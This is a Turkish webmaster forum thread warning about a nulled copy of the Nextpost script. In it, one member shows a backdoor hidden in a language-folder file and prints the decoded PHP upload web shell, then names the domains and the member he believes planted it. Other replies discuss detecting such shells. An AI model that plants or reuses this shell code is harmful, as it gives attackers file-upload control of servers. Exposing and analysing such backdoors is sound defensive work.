lostyazilim
tr.link

Nulled ve Shell Yapımcı Bir Türk Hemde Bu Forumda :)

9 Mesajlar 2.102 Okunma
acebozum
tr.link

Penunbra Penunbra <?web Geliştiricisi Kullanıcı
  • Üyelik 10.01.2015
  • Yaş/Cinsiyet 34 / E
  • Meslek Developer
  • Konum Antalya
  • Ad Soyad Ö** K**
  • Mesajlar 378
  • Beğeniler 218 / 117
  • Ticaret 4, (%100)

Merhabalar;

Bir arkadaşımızın kullanmış olduğu script (Nextpost) yüzünden kısacası "Nulled Maceresı" ile başlar ve sıra bana gelince şöyle detaylıca bir inceleme yapınca bakın neler buldum.

Umarım siz değerli üyeler ve yetkililer keyifle okur :)




\locale\hi-IN\uploadController.php klasöründe ki dosyaya eklenmiş gizli bir şekilde. Dil dosyalarının arasında gizlemiş :)




Decode Ettiğimizde Sonuç;

echo "".php_uname()."";
echo "

";
echo '
';
echo '
';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo 'Yukleme Basarili

';
}
}


Peki nereye gidiyor bunlar :)

http://beta.takipciartirma.com/editor/");
https://takipciartirma.com


Yapımcı olarak birde neler eklemiş ona bakalım :)

"author" => "Muzaffer Şaxxx",
"author_uri" => "https://takipciartirma.com",


Sonuç olarak; evet bu arkadaş aramızda :) Kendiside bu işi yaparak TİCARET yapmaya çalışıyor :) Malum kullanıcıyı etiket ve tam ismini girmedim. Yönetici arkadaşlar talep ederse özelden verebilirim.

Umuyorum ki her birey emeğe saygılı, herşey para diyerek, herşey mübahtır demeyen bir nesil olmak dileğiyle sağlıcakla.



admin
ibrahimTatar telatabi darki66

kişi bu mesajı beğendi.

elektronikssl
webimgo

Shakedown Shakedown Forza BEŞİKTAŞ Kullanıcı
  • Üyelik 18.10.2011
  • Yaş/Cinsiyet 43 / E
  • Meslek Çevre Mühendisi
  • Konum İstanbul Anadolu
  • Ad Soyad G** G**
  • Mesajlar 1708
  • Beğeniler 225 / 548
  • Ticaret 60, (%100)
Madem böyle bir durum söz konusu, şahsi düşüncem kullanıcıyı ifşa etmeniz. Çünkü bu konuyu görmeyen forumdan her hangi birisi şu an o şahıs ile ticaret yapıyor olabilir.
Penunbra

kişi bu mesajı beğendi.

"Tabiatın isteklerini anlamazlıktan gelen, cezasını görür." [Balzac]

darki66 darki66 WM Aracı Kullanıcı
  • Üyelik 21.04.2015
  • Yaş/Cinsiyet 29 / E
  • Meslek BİLİŞİM
  • Konum Ankara
  • Ad Soyad E** P**
  • Mesajlar 150
  • Beğeniler 10 / 40
  • Ticaret 0, (%0)
Bende yardimci olayim.Ve şahısı ifşa edeyim

https://m.wmaraci.com/forum/uyeler/47643-muzaffer72

Kendisinden açıklama bekliyorum.
Penunbra

kişi bu mesajı beğendi.

telatabi telatabi istalya.com Kullanıcı
  • Üyelik 25.05.2014
  • Yaş/Cinsiyet 34 / E
  • Meslek Social Media &amp; Web Solutions
  • Konum İstanbul Anadolu
  • Ad Soyad Y** S**
  • Mesajlar 683
  • Beğeniler 282 / 122
  • Ticaret 19, (%100)
Kodlardan tam anlayamadım. Şahıs ınstagram bilgisi mi çekiyor
 

 

wmaraci
wmaraci

darki66 darki66 WM Aracı Kullanıcı
  • Üyelik 21.04.2015
  • Yaş/Cinsiyet 29 / E
  • Meslek BİLİŞİM
  • Konum Ankara
  • Ad Soyad E** P**
  • Mesajlar 150
  • Beğeniler 10 / 40
  • Ticaret 0, (%0)
@teletapi adam shell yerleştirmiş daha ne yapsin
Penunbra

kişi bu mesajı beğendi.

Escalous Escalous Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 09.08.2018
  • Yaş/Cinsiyet 24 / E
  • Meslek (.*?)
  • Konum Diğer
  • Ad Soyad A** Ş**
  • Mesajlar 1392
  • Beğeniler 421 / 799
  • Ticaret 4, (%100)
E hocam warezden ne bekliyordunuz?
Warez piyasası böyledir. Babalarının hayrına paylaşmıyorlar ya.. bu konuda Azda olsa Ruslara guvenirim birtek.

Bu daha ne ki adamın biri One page html bir tasarıma (index.html, styles.css,font awesome font&css,images dosyalarından) oluşan bir tasarımı alıp içine includes klasörü koymuş. Baska bir scriptten almış atmış 😂 haliyle İçerisinde bir sürü PHP dosyası var :D config vs. birtane de Shell yakaladım. Adam Shell dosyası yedirmek için tasarımda gerekliymiş gibi bir sürü PHP dosyası koyuyor içinede bir tane Shell 🤣
sterk

kişi bu mesajı beğendi.

markareklam markareklam WM Aracı Kullanıcı
  • Üyelik 11.02.2019
  • Yaş/Cinsiyet 44 / E
  • Meslek Reklamcılık
  • Konum İzmir
  • Ad Soyad H** A**
  • Mesajlar 232
  • Beğeniler 4 / 54
  • Ticaret 0, (%0)
Peki bu tarz shell dosyalarını taratıp bulabileceğimiz bir yöntem varmı?? naıl buluruz yani böyle kaçak kodları..Tek tek aramakla olmaz virustotal gibi bir site varmı?
 

 

www.izmirdetabelareklam.com

Penunbra Penunbra <?web Geliştiricisi Kullanıcı
  • Üyelik 10.01.2015
  • Yaş/Cinsiyet 34 / E
  • Meslek Developer
  • Konum Antalya
  • Ad Soyad Ö** K**
  • Mesajlar 378
  • Beğeniler 218 / 117
  • Ticaret 4, (%100)
markareklam VT gibi siteleri kolaylıkla bypass ediyorlar, dosya güvenli olarak gözüküyor. En sağlıklı yöntem dosyaların her birini tek tek açıp kod yapısını incelemektir. Zaten bir tane sıkıntılı bir kod yapısı var ise diğerlerine bakmaya gerek bile yoktur.
 

 

markareklam markareklam WM Aracı Kullanıcı
  • Üyelik 11.02.2019
  • Yaş/Cinsiyet 44 / E
  • Meslek Reklamcılık
  • Konum İzmir
  • Ad Soyad H** A**
  • Mesajlar 232
  • Beğeniler 4 / 54
  • Ticaret 0, (%0)
O iş baş olmaz öyle ya ohoooo hangisinde arıycanda bulucanda bide zaten siteyi yayınlamışsan üstüne bi sürü kod eklenmişse ....
 

 

www.izmirdetabelareklam.com
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al